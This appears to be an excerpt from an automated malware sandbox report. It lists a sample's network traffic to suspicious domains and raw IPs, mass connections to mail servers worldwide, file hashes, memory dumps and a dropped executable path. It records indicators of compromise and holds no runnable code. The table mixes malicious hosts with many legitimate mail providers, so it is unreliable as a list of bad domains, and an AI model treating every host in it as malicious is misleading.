| GB | 216.58.201.110:443 | apis.google.com | udp |
| GB | 142.250.178.10:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.22:443 | nw-umwatson.events.data.microsoft.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4117 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4117 | towerbingobongoboom.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | out.teme3.fsnet.co.uk | udp |
| US | 8.8.8.8:53 | out.csh.org.tw | udp |
| US | 8.8.8.8:53 | sky.com | udp |
| US | 8.8.8.8:53 | tcpsva.org | udp |
| GB | 90.216.128.5:587 | sky.com | tcp |
| US | 34.238.178.141:2525 | tcpsva.org | tcp |
| US | 8.8.8.8:53 | sdibanjarmasin.id | udp |
| US | 8.8.8.8:53 | edu.univali.br | udp |
| US | 8.8.8.8:53 | uninga.jacad.com.br | udp |
| BR | 168.75.103.159:25 | uninga.jacad.com.br | tcp |
| BR | 200.169.52.200:2525 | edu.univali.br | tcp |
| ID | 103.142.21.130:587 | sdibanjarmasin.id | tcp |
| US | 8.8.8.8:53 | michaelcogliantry.com | udp |
| US | 8.8.8.8:53 | mail.alexia.cnsfatima.es | udp |
| US | 8.8.8.8:53 | aspmx.l.google.com | udp |
| US | 8.8.8.8:53 | secure.mangatraders.com | udp |
| US | 8.8.8.8:53 | mbmail.mynet.com | udp |
| US | 8.8.8.8:53 | smtp.virgilio.it | udp |
| US | 8.8.8.8:53 | seznam.cz | udp |
| US | 8.8.8.8:53 | mxbiz1.qq.com | udp |
| US | 8.8.8.8:53 | mxb.mailgun.org | udp |
| US | 8.8.8.8:53 | sanoma.co | udp |
| TR | 212.101.98.165:25 | mbmail.mynet.com | tcp |
| US | 104.21.64.149:465 | michaelcogliantry.com | tcp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 69.16.230.165:587 | secure.mangatraders.com | tcp |
| SE | 51.20.180.70:587 | sanoma.co | tcp |
| IT | 213.209.1.145:587 | smtp.virgilio.it | tcp |
| US | 34.149.236.64:465 | mxb.mailgun.org | tcp |
| NL | 142.250.27.26:2525 | aspmx.l.google.com | tcp |
| NL | 142.250.27.26:2525 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | securesmtp.kadesign.ch | udp |
| US | 8.8.8.8:53 | out.EpicHK.com | udp |
| US | 8.8.8.8:53 | iypjdlyj.com | udp |
| US | 8.8.8.8:53 | mail.jazzforpeace.org | udp |
| US | 8.8.8.8:53 | securesmtp.angelspet.com.br | udp |
| US | 8.8.8.8:53 | mail.unigine.com | udp |
| US | 8.8.8.8:53 | mail.rbsbusinesscapital.com | udp |
| US | 8.8.8.8:53 | secure.contabilie.com.br | udp |
| HK | 103.86.78.2:25 | mxbiz1.qq.com | tcp |
| NL | 83.149.100.90:25 | mail.unigine.com | tcp |
| US | 8.8.8.8:53 | secure.zcomet.fr | udp |
| US | 8.8.8.8:53 | alt1.aspmx.l.google.com | udp |
| DE | 142.251.9.27:587 | alt1.aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | mail.oapn.es | udp |
| US | 8.8.8.8:53 | aspmx2.googlemail.com | udp |
| US | 8.8.8.8:53 | mail.witteringpc.co.uk | udp |
| US | 8.8.8.8:53 | secure.sg.mc.gov.pt | udp |
| DE | 142.251.9.26:465 | aspmx2.googlemail.com | tcp |
| ES | 185.73.174.75:587 | mail.oapn.es | tcp |
| US | 8.8.8.8:53 | securesmtp.adecoagro.com | udp |
| US | 8.8.8.8:53 | secure.linwoodschools.org | udp |
| US | 8.8.8.8:53 | securesmtp.lozere.gouv.fr | udp |
| US | 8.8.8.8:53 | 5koepfe.de | udp |
| US | 8.8.8.8:53 | securesmtp.zing.cn | udp |
| US | 8.8.8.8:53 | out.audio-concept.com | udp |
| US | 8.8.8.8:53 | out.vbdqgvgr.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | securesmtp.gateshead.org | udp |
| US | 8.8.8.8:53 | rogers.com | udp |
| US | 8.8.8.8:53 | secure.feed-it.io | udp |
| CA | 40.85.218.2:587 | rogers.com | tcp |
| US | 8.8.8.8:53 | secure.div.ua | udp |
| US | 8.8.8.8:53 | albany-wa-gov-au.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | out.bngroup.com.br | udp |
| AU | 52.101.149.9:587 | albany-wa-gov-au.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | alt4.aspmx.l.google.com | udp |
| US | 8.8.8.8:53 | securesmtp.incharge.nl | udp |
| NL | 142.250.27.26:25 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | mail.diever.com.br | udp |
| TW | 142.250.157.27:25 | alt4.aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| HK | 8.218.126.38:25 | securesmtp.zing.cn | tcp |
| US | 8.8.8.8:53 | mxb-005e8003.gslb.pphosted.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | securesmtp.tpadp.com | udp |
| US | 8.8.8.8:53 | smtp.prezzocomprare.com | udp |
| US | 8.8.8.8:53 | mail.aleixo.de | udp |
| US | 8.8.8.8:53 | pandora.be | udp |
| US | 8.8.8.8:53 | smtp.calchoice.com | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| BE | 195.130.131.33:587 | pandora.be | tcp |
| US | 8.8.8.8:53 | csr-com-au.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | smtp.dpg.hu | udp |
| US | 8.8.8.8:53 | securesmtp.quebeccreation.ca | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| BR | 191.252.112.195:25 | mail.diever.com.br | tcp |
| AU | 52.101.151.0:25 | csr-com-au.mail.protection.outlook.com | tcp |
| US | 148.163.159.80:587 | mxb-005e8003.gslb.pphosted.com | tcp |
| US | 8.8.8.8:53 | mail.chaccau.com.br | udp |
| US | 8.8.8.8:53 | mail.uioytytr.com | udp |
| US | 8.8.8.8:53 | smtp.dialer.com | udp |
| US | 8.8.8.8:53 | smtp.ngsat.com.br | udp |
| US | 8.8.8.8:53 | ALT2.ASPMX.L.GOOGLE.COM | udp |
| US | 8.8.8.8:53 | mail.solinces.com | udp |
| US | 165.160.15.20:25 | smtp.dialer.com | tcp |
| FI | 142.250.150.26:587 | ALT2.ASPMX.L.GOOGLE.COM | tcp |
| US | 192.185.185.219:25 | mail.solinces.com | tcp |
| US | 8.8.8.8:53 | telekom.de | udp |
| US | 8.8.8.8:53 | mx00.ionos.fr | udp |
| US | 8.8.8.8:53 | securesmtp.kmchow.com | udp |
| DE | 212.227.15.41:465 | mx00.ionos.fr | tcp |
| DE | 80.158.67.40:587 | telekom.de | tcp |
| US | 8.8.8.8:53 | secure.aquantive.com | udp |
| US | 8.8.8.8:53 | mail.asdfmailk.com | udp |
| US | 8.8.8.8:53 | autograf.pl | udp |
| US | 8.8.8.8:53 | smtp.ig.com.br | udp |
| BR | 168.0.132.203:587 | smtp.ig.com.br | tcp |
| US | 75.2.24.159:587 | autograf.pl | tcp |
| DE | 3.122.230.153:587 | mail.asdfmailk.com | tcp |
| US | 8.8.8.8:53 | securesmtp.bridgecommunication.ro | udp |
| US | 8.8.8.8:53 | mail.yaghoo.fr | udp |
| US | 8.8.8.8:53 | mail.apps.correios.com.br | udp |
| HK | 210.245.166.68:587 | securesmtp.kmchow.com | tcp |
| US | 8.8.8.8:53 | mail.rsv12.ua | udp |
| US | 8.8.8.8:53 | mail.psisun.u-psud.fr | udp |
| US | 8.8.8.8:53 | sflhidta.org | udp |
| US | 8.8.8.8:53 | smtp.alinea.fr | udp |
| US | 8.8.8.8:53 | smtp.comcast.net | udp |
| US | 96.103.145.180:587 | smtp.comcast.net | tcp |
| US | 74.120.45.71:587 | sflhidta.org | tcp |
| US | 8.8.8.8:53 | mail.brssd.org | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 24.104.151.193:25 | mail.brssd.org | tcp |
| US | 8.8.8.8:53 | hotelurbano.com.br | udp |
| US | 8.8.8.8:53 | mail.bki.co.id | udp |
| US | 8.8.8.8:53 | mx-in.mail.hosting-platform.com | udp |
| US | 8.8.8.8:53 | secure.523gtr.com | udp |
| US | 8.8.8.8:53 | mail.tlccentre.ie | udp |
| US | 8.8.8.8:53 | mail.gandhara.com.au | udp |
| US | 35.186.229.225:587 | hotelurbano.com.br | tcp |
| US | 8.8.8.8:53 | tinhenry.com | udp |
| US | 8.8.8.8:53 | smtp.idworld.nt | udp |
| US | 8.8.8.8:53 | mx2.davita.iphmx.com | udp |
| US | 8.8.8.8:53 | securesmtp.pearlkite.co.uk | udp |
| US | 8.8.8.8:53 | fmail1.teol.net | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 172.67.179.152:465 | tinhenry.com | tcp |
| US | 68.232.137.70:587 | mx2.davita.iphmx.com | tcp |
| BA | 81.93.94.130:25 | fmail1.teol.net | tcp |
| US | 8.8.8.8:53 | mtsd.k12.nj.us | udp |
| US | 209.114.152.135:2525 | mtsd.k12.nj.us | tcp |
| US | 8.8.8.8:53 | azet.sk | udp |
| US | 8.8.8.8:53 | out.euro.com | udp |
| US | 8.8.8.8:53 | aragorn.eaitelecom.com.br | udp |
| NL | 142.250.27.26:25 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | smtp.lyokoweb.fr | udp |
| US | 8.8.8.8:53 | absamail.co.za | udp |
| US | 8.8.8.8:53 | smtp-mibc-fr-01.mailinblack.com | udp |
| US | 8.8.8.8:53 | chaybasten.com | udp |
| US | 8.8.8.8:53 | bbox.fr | udp |
| US | 8.8.8.8:53 | secure.rivkobg.com | udp |
| US | 8.8.8.8:53 | spamrelay.zxcs.nl | udp |
| US | 8.8.8.8:53 | smtp.vvs-ltd.poltava.ua | udp |
| US | 96.103.145.180:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | 358.fi | udp |
| US | 8.8.8.8:53 | out.centraxgt.com | udp |
| US | 8.8.8.8:53 | securesmtp.oausdhg.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | stikesmitrabundapersada.ac.id | udp |
| US | 8.8.8.8:53 | mail.hmidiaexterior.com.br | udp |
| US | 8.8.8.8:53 | pace.co.uk | udp |
| US | 8.8.8.8:53 | reticulum.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | out.ppi.com.tw | udp |
| US | 52.101.10.16:465 | reticulum.mail.protection.outlook.com | tcp |
| GB | 89.234.4.55:2525 | pace.co.uk | tcp |
| US | 75.2.70.75:465 | 358.fi | tcp |
| SK | 91.235.52.77:587 | azet.sk | tcp |
| FR | 40.89.148.181:587 | smtp-mibc-fr-01.mailinblack.com | tcp |
| NL | 185.104.28.12:25 | spamrelay.zxcs.nl | tcp |
| BR | 200.71.77.42:587 | aragorn.eaitelecom.com.br | tcp |
| US | 8.8.8.8:53 | mail.conyman.com | udp |
| FR | 145.239.130.85:465 | smtp.lyokoweb.fr | tcp |
| US | 50.16.218.27:587 | out.euro.com | tcp |
| US | 8.8.8.8:53 | smtp.inkmaker.com | udp |
| ES | 188.93.75.134:25 | mail.conyman.com | tcp |
| ZA | 196.41.6.140:587 | absamail.co.za | tcp |
| BR | 191.6.216.99:587 | mail.hmidiaexterior.com.br | tcp |
| GB | 193.203.116.26:25 | mx-in.mail.hosting-platform.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | masalakitchenfoods.com | udp |
| US | 15.197.148.33:2525 | masalakitchenfoods.com | tcp |
| US | 8.8.8.8:53 | mail.student.upce.cz | udp |
| US | 8.8.8.8:53 | yonkerspublicschools-org.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | gmsil.com | udp |
| US | 8.8.8.8:53 | taalim.ma | udp |
| US | 8.8.8.8:53 | mail.andrewgormley.com | udp |
| US | 8.8.8.8:53 | smtp.borcal.com.ar | udp |
| US | 8.8.8.8:53 | secure.koforum.net | udp |
| US | 8.8.8.8:53 | out.jonno.cixco.uk | udp |
| US | 8.8.8.8:53 | abv.bg | udp |
| US | 8.8.8.8:53 | mail.carensognainblu.es | udp |
| US | 8.8.8.8:53 | spam.gg.go.kr | udp |
| US | 8.8.8.8:53 | smtp.fox-events.fr | udp |
| NL | 142.250.27.26:587 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | crdt.org.kh | udp |
| US | 8.8.8.8:53 | h2pd.com | udp |
| US | 8.8.8.8:53 | smtp.comcast.net | udp |
| US | 8.8.8.8:53 | za-smtp-inbound-1.mimecast.co.za | udp |
| US | 8.8.8.8:53 | smtp.hsa-env.com | udp |
| US | 8.8.8.8:53 | mx.a.locaweb.com.br | udp |
| ZA | 41.74.197.210:587 | za-smtp-inbound-1.mimecast.co.za | tcp |
| BR | 186.202.4.42:465 | mx.a.locaweb.com.br | tcp |
| BG | 194.153.145.104:587 | abv.bg | tcp |
| US | 52.101.10.6:25 | yonkerspublicschools-org.mail.protection.outlook.com | tcp |
| US | 69.16.230.165:465 | h2pd.com | tcp |
| KR | 27.101.137.123:465 | spam.gg.go.kr | tcp |
| US | 198.49.23.144:587 | gmsil.com | tcp |
| ES | 212.227.145.58:587 | mail.carensognainblu.es | tcp |
| US | 3.130.204.160:465 | smtp.hsa-env.com | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| IL | 185.230.63.107:465 | crdt.org.kh | tcp |
| US | 8.8.8.8:53 | mx11.surfmailfilter.nl | udp |
| NL | 195.169.13.8:2525 | mx11.surfmailfilter.nl | tcp |
| US | 8.8.8.8:53 | securesmtp.yourtopnotch.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| NL | 142.250.27.26:587 | aspmx.l.google.com | tcp |
| IT | 213.209.1.145:587 | smtp.virgilio.it | tcp |
| US | 8.8.8.8:53 | tele2.fr | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | mxb-00133a01.gslb.pphosted.com | udp |
| US | 8.8.8.8:53 | out.hn.ns | udp |
| US | 8.8.8.8:53 | out.scharloo.eu | udp |
| US | 8.8.8.8:53 | smtp.progesys.ca | udp |
| US | 8.8.8.8:53 | out.post.dk | udp |
| US | 8.8.8.8:53 | smtp.davidmaxwell.ca | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | mail.hotseat.ca | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 169.54.82.183:25 | mail.hotseat.ca | tcp |
| US | 8.8.8.8:53 | mail.universal-services.co.uk | udp |
| US | 8.8.8.8:53 | protonmail.fr | udp |
| IT | 213.209.1.145:587 | smtp.virgilio.it | tcp |
| US | 8.8.8.8:53 | out.evilpacket.org | udp |
| US | 8.8.8.8:53 | mx.generic-isp.com | udp |
| US | 67.231.153.149:465 | mxb-00133a01.gslb.pphosted.com | tcp |
| US | 3.33.139.32:587 | protonmail.fr | tcp |
| NL | 142.93.237.125:587 | mx.generic-isp.com | tcp |
| NL | 142.250.27.26:587 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | securesmtp.hregards.fr | udp |
| US | 8.8.8.8:53 | securesmtp.1spotify.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | securesmtp.altex-security.co.uk | udp |
| US | 8.8.8.8:53 | secure.multisatsnc.it.portal | udp |
| US | 8.8.8.8:53 | smtp.fastmail.be | udp |
| US | 8.8.8.8:53 | securesmtp.haubensak53.com | udp |
| US | 8.8.8.8:53 | luatminhkhue.vn | udp |
| US | 199.188.200.154:25 | mail.agenkey.com | tcp |
| US | 104.26.11.109:2525 | luatminhkhue.vn | tcp |
| US | 8.8.8.8:53 | mail.wvmllc.com | udp |
| US | 8.8.8.8:53 | securesmtp.yinki.org | udp |
| US | 8.8.8.8:53 | mxgw.bcc.gov.bd | udp |
| FI | 142.250.150.26:25 | ALT2.ASPMX.L.GOOGLE.COM | tcp |
| US | 8.8.8.8:53 | mail17.lh.pl | udp |
| US | 8.8.8.8:53 | smtp.hotamil.com | udp |
| US | 8.8.8.8:53 | me.com | udp |
| BD | 43.229.13.205:25 | mxgw.bcc.gov.bd | tcp |
| US | 17.253.142.4:587 | me.com | tcp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 103.224.212.213:587 | securesmtp.1spotify.com | tcp |
| PL | 185.135.89.106:587 | mail17.lh.pl | tcp |
| IE | 52.164.206.56:587 | smtp.hotamil.com | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| US | 8.8.8.8:53 | hawthornes.co.uk | udp |
| US | 8.8.8.8:53 | securesmtp.umz.ac.ir | udp |
| US | 8.8.8.8:53 | mail.post.skynet.lt | udp |
| US | 8.8.8.8:53 | mail.mg-bacchamoise.fr | udp |
| US | 8.8.8.8:53 | santander.com.br | udp |
| US | 8.8.8.8:53 | oi-com0c.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | rangs.com | udp |
| NL | 23.200.188.67:587 | santander.com.br | tcp |
| US | 52.101.9.26:25 | oi-com0c.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | out.ag.com | udp |
| US | 8.8.8.8:53 | smtp.meto.ua | udp |
| US | 162.255.119.253:2525 | hawthornes.co.uk | tcp |
| US | 8.8.8.8:53 | iguacumaquinas-com-br.mail.protection.outlook.com | udp |
| NL | 142.250.27.26:2525 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | smtp.heijmans.nl | udp |
| US | 8.8.8.8:53 | citromail.hu | udp |
| DE | 167.99.248.199:587 | citromail.hu | tcp |
| BR | 52.101.198.0:25 | iguacumaquinas-com-br.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | secure.jamnme.net | udp |
| US | 8.8.8.8:53 | out.aslcs.co.uk | udp |
| US | 8.8.8.8:53 | secure.hilfiker.com | udp |
| US | 8.8.8.8:53 | secure.apexsql.com | udp |
| US | 8.8.8.8:53 | out.donquesotori.es | udp |
| US | 8.8.8.8:53 | mx00.ionos.de | udp |
| US | 8.8.8.8:53 | smtp1-mke.securence.com | udp |
| US | 8.8.8.8:53 | cnetmail.net | udp |
| US | 8.8.8.8:53 | smtp.mfernandes.net | udp |
| US | 8.8.8.8:53 | walla.com | udp |
| US | 8.8.8.8:53 | secure.ndt-ag.de | udp |
| DE | 212.227.15.41:587 | mx00.ionos.de | tcp |
| US | 216.17.3.48:2525 | smtp1-mke.securence.com | tcp |
| US | 34.102.212.0:587 | walla.com | tcp |
| BR | 191.252.112.195:465 | smtp.mfernandes.net | tcp |
| HK | 210.87.250.18:465 | mail.biznetvigator.com | tcp |
| US | 8.8.8.8:53 | secure.viareal.com | udp |
| US | 8.8.8.8:53 | mail.exon2000.hu | udp |
| US | 8.8.8.8:53 | tele2.it | udp |
| US | 8.8.8.8:53 | secure.marangoninegocios.com.br | udp |
| US | 8.8.8.8:53 | out.atoutcoeur.com | udp |
| US | 8.8.8.8:53 | mail.rathinam.in | udp |
| US | 8.8.8.8:53 | out.aepardilho.pt | udp |
| US | 8.8.8.8:53 | clearwire.net | udp |
| US | 8.8.8.8:53 | out.zjeannine.fr | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 67.222.21.222:587 | clearwire.net | tcp |
| GB | 216.58.212.211:2525 | mail.exon2000.hu | tcp |
| US | 164.90.244.158:465 | out.atoutcoeur.com | tcp |
| FI | 142.250.150.26:25 | ALT2.ASPMX.L.GOOGLE.COM | tcp |
| US | 8.8.8.8:53 | mx01.ionos.co.uk | udp |
| US | 8.8.8.8:53 | meyers.fr | udp |
| US | 8.8.8.8:53 | mx2-eu1.ppe-hosted.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | gmbol.cem | udp |
| DE | 185.132.181.17:25 | mx2-eu1.ppe-hosted.com | tcp |
| DE | 217.72.192.67:465 | mx01.ionos.co.uk | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | securesmtp.znnohklf.fr | udp |
| US | 8.8.8.8:53 | out.konfer.sk | udp |
| US | 8.8.8.8:53 | mx-caprica.easydns.com | udp |
| US | 8.8.8.8:53 | youzend.net | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | pixnet.net | udp |
| US | 8.8.8.8:53 | aruba.it | udp |
| US | 8.8.8.8:53 | secure.intercable.net.ve | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 15.197.225.128:25 | youzend.net | tcp |
| IT | 62.149.188.200:587 | aruba.it | tcp |
| CA | 64.68.200.41:25 | mx-caprica.easydns.com | tcp |
| US | 8.8.8.8:53 | gonetor.com | udp |
| US | 8.8.8.8:53 | viagausa.info | udp |
| US | 8.8.8.8:53 | mail.intekom.com | udp |
| US | 8.8.8.8:53 | mail.34.com | udp |
| ZA | 197.234.175.113:587 | mail.intekom.com | tcp |
| US | 44.221.84.105:25 | secure.intercable.net.ve | tcp |
| CA | 52.60.87.163:587 | viagausa.info | tcp |
| SK | 213.215.124.143:2525 | out.konfer.sk | tcp |
| US | 8.8.8.8:53 | smtp.pernixllc.com | udp |
| US | 8.8.8.8:53 | mail.metameer.com | udp |
| US | 8.8.8.8:53 | dannybhai.com | udp |
| US | 8.8.8.8:53 | secure.metalsa.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| NL | 142.250.27.26:587 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | out.mbox301.tele2.se | udp |
| US | 8.8.8.8:53 | worldmail.fr | udp |
| US | 8.8.8.8:53 | contacto.ch | udp |
| BG | 194.153.145.104:587 | abv.bg | tcp |
| US | 8.8.8.8:53 | route1.mx.cloudflare.net | udp |
| US | 8.8.8.8:53 | spartannash-com.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | goods2order.com | udp |
| TW | 103.23.108.107:2525 | pixnet.net | tcp |
| US | 172.67.215.163:587 | dannybhai.com | tcp |
| IE | 52.215.95.29:465 | contacto.ch | tcp |
| US | 162.159.205.13:25 | route1.mx.cloudflare.net | tcp |
| US | 52.101.10.8:25 | spartannash-com.mail.protection.outlook.com | tcp |
| FR | 213.186.33.5:2525 | worldmail.fr | tcp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| US | 8.8.8.8:53 | out.etu.utc.fr | udp |
| US | 8.8.8.8:53 | btconnect.com | udp |
| US | 64.98.135.35:465 | goods2order.com | tcp |
| GB | 216.58.212.211:25 | mail.exon2000.hu | tcp |
| US | 8.8.8.8:53 | secure.student.vuw.ac.nz | udp |
| US | 8.8.8.8:53 | out.mmogames.in | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | infotechservices.it | udp |
| US | 34.149.236.64:2525 | mxb.mailgun.org | tcp |
| US | 8.8.8.8:53 | keith-swift.co.uk | udp |
| US | 8.8.8.8:53 | mail.wallywatts.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | umeal.app | udp |
| US | 8.8.8.8:53 | secure.bigstring.co | udp |
| DE | 46.101.111.206:587 | mail.wallywatts.com | tcp |
| TH | 103.212.36.65:2525 | umeal.app | tcp |
| IT | 31.11.35.160:25 | infotechservices.it | tcp |
| US | 8.8.8.8:53 | out.magdolna.ro | udp |
| US | 8.8.8.8:53 | secure.roobykon.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| US | 8.8.8.8:53 | castflow.com.br | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | out.asila.org | udp |
| US | 8.8.8.8:53 | out.jetamp3.com | udp |
| US | 8.8.8.8:53 | mesa-sas.it | udp |
| US | 8.8.8.8:53 | smtp.adres.pl | udp |
| US | 8.8.8.8:53 | smtp.salefuse.com | udp |
| US | 8.8.8.8:53 | secure.almordalashmal.com | udp |
| IT | 213.209.1.145:587 | smtp.virgilio.it | tcp |
| US | 8.8.8.8:53 | secure.poet.de | udp |
| US | 8.8.8.8:53 | mail.yhjhg.com | udp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| US | 13.248.169.48:2525 | smtp.salefuse.com | tcp |
| PL | 213.180.142.211:587 | smtp.adres.pl | tcp |
| IT | 80.88.86.113:465 | mesa-sas.it | tcp |
| US | 8.8.8.8:53 | out.bk.cob | udp |
| US | 8.8.8.8:53 | securesmtp.vistaas.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | smtp.bciswest.org | udp |
| US | 13.248.169.48:587 | securesmtp.vistaas.com | tcp |
| US | 8.8.8.8:53 | pathao.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 104.21.112.1:2525 | pathao.com | tcp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | secure.cegetel.net | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | out.digitalmail.info | udp |
| US | 8.8.8.8:53 | out.sarinecrossfit.ch | udp |
| US | 8.8.8.8:53 | securesmtp.sandaaker.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | student.staffs.ac.uk | udp |
| US | 8.8.8.8:53 | mail.newscorp.com | udp |
| US | 8.8.8.8:53 | bossy.pl | udp |
| US | 8.8.8.8:53 | out.adams.com.pl | udp |
| US | 8.8.8.8:53 | peelsb-com.mail.protection.outlook.com | udp |
Files
| MD5 | 14a2a0c0b23dc5eaff018b36e62075fd |
| SHA1 | f693aa0889f5f8f92f0a721a6e8a48ac2a02f302 |
| SHA256 | 67d6df2caa1039329c46d6a66c00a45a5baa42b5c93fca7e238eb42ad5ace822 |
| SHA512 | d32bb8b4657a55c5a8e8a75cad4b9bdbd964057e3d03ee54b0c337c2db357a00fb0f15dd628f5f1da68e92ae9b866978bf6ec5337ad52cc2b4180e4c2f967c98 |
memory/2272-432-0x0000000004530000-0x0000000004531000-memory.dmp
memory/3876-434-0x000001C68CD30000-0x000001C68CE30000-memory.dmp
memory/3876-439-0x000001C68DD60000-0x000001C68DD80000-memory.dmp
memory/3876-435-0x000001C68CD30000-0x000001C68CE30000-memory.dmp
memory/3876-468-0x000001C68E120000-0x000001C68E140000-memory.dmp
memory/3876-454-0x000001C68DD20000-0x000001C68DD40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
